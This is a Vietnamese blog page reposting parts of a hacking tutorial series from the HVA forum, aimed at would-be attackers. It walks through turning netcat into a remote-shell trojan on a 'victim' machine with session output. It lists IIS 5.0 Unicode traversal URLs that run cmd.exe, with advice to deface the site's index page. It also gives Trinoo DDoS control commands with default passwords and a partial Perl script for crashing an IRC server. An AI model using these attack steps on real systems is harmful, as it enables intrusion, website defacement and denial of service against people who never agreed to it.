_Công cụ thứ 3 : NMAP là Công cụ quét cực nhanh và mạnh. Có thể quét trên mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem những dịch vụ nào đang chạy trên server (services / ports : webserver , ftpserver , pop3,...),server đang dùng hệ điều hành gì,loại tường lửa mà server sử dụng,...và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹ thuật quét như : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản trị mạng trên thế giới.
Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/ .
_ Công cụ thứ 4 : Stealth HTTP Security Scanner là công cụ quét lỗi bảo mật tuyệt vời trên Win32. Nó có thể quét được hơn 13000 lỗi bảo mật và nhận diện được 5000 exploits khác.
_ Công cụ thứ 5 : IntelliTamper là công cụ hiển thị cấu trúc của một Website gồm những thư mục và file nào, nó có thể liệt kê được cả thư mục và file có set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack một Website thì bạn phải nắm một số thông tin của Admin và Website đó.
_ Công cụ thứ 6 : Netcat là công cụ đọc và ghi dữ liệu qua mạng thông qua giao thức TCP hoặc UDP. Bạn có thể dùng Netcat 1 cách trực tiếp hoặc sử dụng chương trình script khác để điều khiển Netcat. Netcat được coi như 1 exploitation tool do nó có thể tạo được liên kết giữa bạn và server cho việc đọc và ghi dữ liệu ( tất nhiên là khi Netcat đã được cài trên 1 server bị lỗI ). Mọi thông tin về Netcat bạn có thể tham khảo tại http://www.l0pht.com/ .
_ Công cụ thứ 7 : Active Perl là công cụ đọc các file Perl đuôi *.pl vì các exploit thường được viết bằng Perl . Nó còn được sử dụng để thi hành các lệnh thông qua các file *.pl .
_ Công cụ thứ 8 : Linux là hệ điều hành hầu hết các hacker đều sử dụng.
_ Công cụ thứ 9 : L0phtCrack là công cụ số một để Crack Password của Windows NT/2000 .
_ Cách Download tôi đã bày rồi nên không nói ở đây , các bạn khi Download nhớ chú ý đến các phiên bản của chúng , phiên bản nào có số lớn nhất thì các bạn hãy Down về mà sài vì nó sẽ có thêm một số tính năng mà các phiên bản trước chưa có . Nếu down về mà các bạn không biết sử dụng thì tìm lại các bài viết cũ có hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thì cứ post bài hỏi , các bạn bên đó sẽ trả lời cho bạn .

48 . ) Hướng dẫn sử dụng Netcat :

a . ) Giới thiệu : Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biết một chút về Netcat .
b . ) Biên dịch :
_ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.
- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu ``/``: // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):

#define GAPING_SECURITY_HOLE
#define TELNET

- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ``:.``
PATH=/sbin:/usr/sbin:...:.
_ Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.
c . ) Các tùy chọn của Netcat :
_ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

CODE
C:\ > nc -h
connect to somewhere: nc [-options] hostname port [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d ----------- tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog --- thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h ----------- gọi hướng dẫn
-i secs ----- trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l ------------- đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L ------------ buộc Netcat ``cố`` lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n ------------ chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o ------------ file ghi nhật kí vào file
-p port ----- chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr ----- giả mạo địa chỉ IP nguồn là addr
-t ------------- không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u ------------- dùng UDP(mặc định netcat dùng TCP)
-v ------------- hiển thị chi tiết các thông tin về kết nối hiện tại.
-vv ----------- sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs ---- đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z ------------- chế độ zero I/O, thường được sử dụng khi scan port


Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080

d . ) Tìm hiểu Netcat qua các VD :

_ Chộp banner của web server :

Ví dụ: nc đến 172.16.84.2, cổng 80

CODE
C:\ > nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html


Để biết thông tin chi tiết về kết nối, bạn có thể dùng –v ( -vv sẽ
cho biết các thông tin chi tiết hơn nữa)

C:\ > nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: ``0-cec-3899eaea``
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK


Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem thử nó đã ghi những gì nhé :

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....


dấu < nghĩa là server gởi đến netcat
dấu > nghĩa là netcat gởi đến server

_ Quét cổng :
Bạn hãy chạy netcat với tùy chọn –z . Nhưng để quét cổng nhanh hơn, bạn hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1- > 500) của host 172.16.106.1

CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open


nếu bạn cần scan các cổng UDP, dùng -u

CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open


_ Biến Netcat thành một trojan :
Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l ( listen ) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe ( đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

CODE
E:\ > nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error


Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

CODE
C:\ > nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E:\ > cd test
cd test
E:\test > dir /w
dir /w
Volume in drive E has no label.
Volume ****** Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
C:\test > exit
exit
sent 20, rcvd 450: NOTSOCK


Như các bạn đã thấy , ta có thể làm những gì trên máy của nạn nhân rồi , chỉ cần một số lệnh cơ bản , ta đã chiếm được máy tính của đối phương , các bạn hãy xem tiếp nhé :

CODE
E:\ > nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...?
?


Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s<địa_chỉ_ip_của_máy_này > . Ví dụ:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe
...
E:\ > nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?


Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.
Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.

( Dựa theo bài viết của huynh Vicky )

49 . ) Kỹ thuật hack IIS server 5.0 :

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận dụng cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .
_ Trước hết các bạn hãy download activeperl và Unicode.pl .
_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay không :

CODE
telnet <> 80
GET HEAD / HTTP/1.0


Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…
_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE
perl unicode.pl
Host: ( gõ địa chỉ server mà các bạn muốn hack )
Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .


_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl ) như sau :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+
[14]/m c/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[17]/iimpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+


Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi .
Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address :

http://www.xxx.com/scripts/..%c1%p c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3
hoặc
http://www.xxx.com/scripts/..%c1%1 c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server của nạn nhân rồi đó , các bạn hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé .

Anhdenday
HVA

Người đăng: vào lúc Không có nhận xét nào:
Nhãn:

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7

41 . ) Tấn công DDoS thông qua Trinoo :

_ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu. Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫn đến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định .
_ Cả Master và Deamon đều được bảo vệ bằng Passwd . chỉ khi chúng ta biết passwd thì mới có thể điều khiển được chúng , điều này không có gì khó khăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ----- > Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập vào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhập đúng thì nó sẽ tự động chạy trên nền của hệ thống .

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is `^]`.
kwijibo
Connection closed by foreign host. < == Bạn đã nhập sai attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is `^]`. betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo > < == bạn đã vào được hệ thống trinoo _ Đây là vài passwd mặc định : “l44adsl``: pass của trinoo daemon . ``gorave``: passwd của trinoo master server khi startup . ``betaalmostdone``: passwd điều khiển từ xa chung cho trinoo master . ``killme``: passwd trinoo master điều khiển lệnh ``mdie`` . _ Đây là một số lệnh dùng để điều khiển Master Server: CODE die------------------------------------------------ ------------Shutdown. quit----------------------------------------------- -------------Log off. mtimer N-------------------------------------------------- --Đặt thờI gian để tấn công DoS , vớI N nhận giá trị từ 1-- > 1999 giây .
dos IP------------------------------------------------- ------Tấn công đến một địa chỉ IP xác định .
mdie pass----------------------------------------------- ----Vô hiệu hoá tất cả các Broadcast , nếu như passwd chính xác . Một lệnh đưọc gửi tới (``d1e l44adsl``) Broadcast để Shutdown chúng . Một passwd riêng biệt sẽ được đặt cho mục này
mping---------------------------------------------- ----------Gửi một lệnh ping tới (``png l44adsl``) c¸c Broadcast.
mdos ------------------------------------------Send nhiều lênh DOS (``xyz l44adsl 123:ip1:ip2``) đến các Broadcast.
info----------------------------------------------- --------------Hiển thị thông tin về Trinoo .
msize---------------------------------------------- ------------Đặt kích thước đệm cho những gói tin được send đi trong suốt thờI gian DoS.
nslookup host----------------------------------------------X ác định tên thiết bị của Host mà Master Trinoo đang chạy .
usebackup------------------------------------------ ---------Chuyển tớI các file Broadcast sao lưu được tạo bởi lệnh “killdead”.
bcast---------------------------------------------- -------------Liệt kê danh sách tất cả các Broadcast có thể khai thác .
help [cmd] --------------------------------------------------- Đưa ra danh sách các lệnh .
mstop---------------------------------------------- -------------Ngừng lại các cuốc tấn công DOS .


_ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:

CODE
aaa pass IP------------------------------------------------- ---Tấn công đến địa chỉ IP đã xác định . GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1-- > 1999 s .
bbb pass N-------------------------------------------------- ---Đặt thờI gian giới hạn cho các cuộc tấn công DOS .
Shi pass----------------------------------------------- ---------Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng 31335/UDP.
png pass----------------------------------------------- --------Send chuỗi “Pong” tớI Master Server phát hành các lệnh điều khiển trên cổng 31335/UDP.
die pass----------------------------------------------- ---------Shutdown Trinoo.
rsz N-------------------------------------------------- ----------Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte .
xyz pass 123:ip1:ip3---------------------------------------- tấn công DOS nhiều mục tiêu cùng lúc .


( Dựa theo hướng dẫn của huynh Binhnx2000 )

Còn nhiều đoạn mã và cách ứng dụng để DoS lắm , các bạn chịu khó tìm hiểu thêm nhé . Nhưng đừng tấn công lung tung , nhất là server của HVA , coi chừng không thu được hiệu quả mà còn bị lock nick nữa đó

Hết phần 6

Anhdenday
HVaonline.net

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7 / 19-12-2004

42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :

_ WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667.
Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:


Nếu bạn dùng Unix:

[hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is `^]`.
[buffer]

Windows cũng tương tự:

telnet irc.example.com 6667

Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .
Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ):

CODE
#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl
use Getopt::Std;
use Socket;
getopts(`s:`, \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$p a ddr,$proto);
$foo = ``A``; # Đây là NOP
$number = ``65000``; # Đây là tất cả số NOP
$data .= $foo x $number; # kết quả của $foo times $number
$serv = $args{s}; # lệnh điều khiển server từ xa
$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667
$buf = ``$data``;
$in_addr = (gethostbyname($serv))[4]



Anhdenday
HVA
Người đăng: vào lúc Không có nhận xét nào:
Nhãn:
Đăng ký: Bài đăng (Atom)

Thông tin về blog này

Blog này được thiết kế bởi Nguyễn Trọng Đạt.
Để biết thêm chi tiết, xin mời liên hệ với tôi. Email : nowthetime_2006@yahoo.com.vn

   Bản quyền © 2009 NTD

Back to TOP